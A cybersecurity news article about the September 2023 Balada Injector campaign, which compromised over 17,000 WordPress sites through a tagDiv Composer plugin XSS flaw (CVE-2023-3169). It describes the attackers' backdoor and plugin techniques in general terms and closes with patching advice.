Massive Balada Injector Attack Targets WordPress Sites in September 2023

85 views 2 minutes read

Massive Balada Injector Attack Targets WordPress Sites in September 2023: In September 2023, a large-scale cyberattack using the Balada Injector malware compromised over 17,000 WordPress websites, marking a significant increase from the previous month.

This attack utilized a known security vulnerability, exposing the vulnerability of many sites.

This news item delves into the details of this attack and its implications.

Key Takeaways on Massive Balada Injector Attack Targets WordPress Sites in September 2023:

  • Widespread Compromises: Over 17,000 WordPress websites fell victim to the Balada Injector attack in September 2023, which exploited security vulnerabilities to gain access to these sites.
  • Vulnerable Plugin Exploited: Approximately 9,000 of the compromised websites were infiltrated using a recently disclosed flaw in the tagDiv Composer plugin (CVE-2023-3169). This vulnerability allowed unauthenticated users to execute stored cross-site scripting (XSS) attacks.
  • Balada Injector Campaign: Balada Injector is an ongoing large-scale operation discovered in December 2022. It exploits WordPress plugin vulnerabilities to deploy a Linux backdoor on affected systems, ultimately redirecting users to malicious content.

The Balada Injector Attack

In September 2023, more than 17,000 WordPress websites fell victim to a major cyberattack conducted using the Balada Injector malware.

This attack was notable because it represented almost twice the number of compromises compared to the previous month.

Massive Balada Injector Attack Targets WordPress Sites in September 2023
Massive Balada Injector Attack Targets WordPress Sites in September 2023

Plugin Vulnerability Exploited

Of the compromised websites, around 9,000 were breached by exploiting a recently disclosed security flaw in the tagDiv Composer plugin, identified as CVE-2023-3169 with a CVSS score of 6.1.

This vulnerability enabled unauthorized users to execute stored cross-site scripting (XSS) attacks.

Targeting tagDiv’s Premium Themes

The Balada Injector gang has a history of targeting vulnerabilities in tagDiv’s premium themes.

In a campaign dating back to the summer of 2017, disclosed security flaws in Newspaper and Newsmag WordPress themes were actively exploited.

Balada Injector Campaign Overview

The Balada Injector campaign, first discovered in December 2022, involves threat actors exploiting various WordPress plugin vulnerabilities to deploy a Linux backdoor on vulnerable systems.

The primary objective of this operation is to direct users of compromised websites to fraudulent tech support pages, deceptive lottery scams, and push notification fraud.

The campaign has impacted over a million websites since 2017.

Recurring Attack Waves

The attacks orchestrated by Balada Injector occur in recurring waves that take place every few weeks, with a notable surge in infections detected on Tuesdays following the commencement of a wave during the weekend.

Exploiting Vulnerabilities

The recent breaches involved exploiting CVE-2023-3169, allowing the injection of a malicious script.

Subsequently, this enabled the attackers to establish persistent access to the compromised sites by uploading backdoors, adding malicious plugins, and creating rogue blog administrators.

Complex Attack Techniques

Balada Injector’s attack scripts have continually evolved. They have shown the ability to plant backdoors in websites’ 404 error pages, enabling the execution of arbitrary PHP code.

Alternatively, these scripts can use embedded code to automatically install a malicious wp-zexit plugin.

This method allows attackers to mimic the entire process of installing a plugin from a ZIP archive file and activating it.

Sophisticated Malware

Newer attack waves, observed in late September 2023, incorporated randomized code injections to download and execute a second-stage malware from a remote server, installing the wp-zexit plugin.

Additionally, obfuscated scripts were employed to transmit visitor cookies to a controlled URL, receiving unspecified JavaScript code in return.

Shift in Attack Methods

In the most recent attacks, threat actors leveraged backdoors and malicious admin users created after successfully targeting website administrators. These methods shifted from exploiting the tagDiv Composer vulnerability.

Conclusion

The massive Balada Injector attack in September 2023 highlights the persistent threat to WordPress websites.

As threat actors adapt their tactics, website administrators and owners must remain vigilant, applying security patches promptly and employing robust security measures to safeguard their sites.

About WordPress: WordPress is a widely-used content management system, while Balada Injector is a notorious malware campaign targeting WordPress vulnerabilities. Sucuri, a security researcher, is among the organizations actively monitoring and reporting on cyber threats to enhance website security.

Leave a Comment

About Us

CyberSecurityCue provides valuable insights, guidance, and updates to individuals, professionals, and businesses interested in the ever-evolving field of cybersecurity. Let us be your trusted source for all cybersecurity-related information.

Editors' Picks

Trending News

©2010 – 2023 – All Right Reserved | Designed & Powered by HostAdvocate

CyberSecurityCue (Cyber Security Cue) Logo
Subscribe To Our Newsletter

Subscribe To Our Newsletter

Join our mailing list for the latest news and updates.

You have Successfully Subscribed!

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More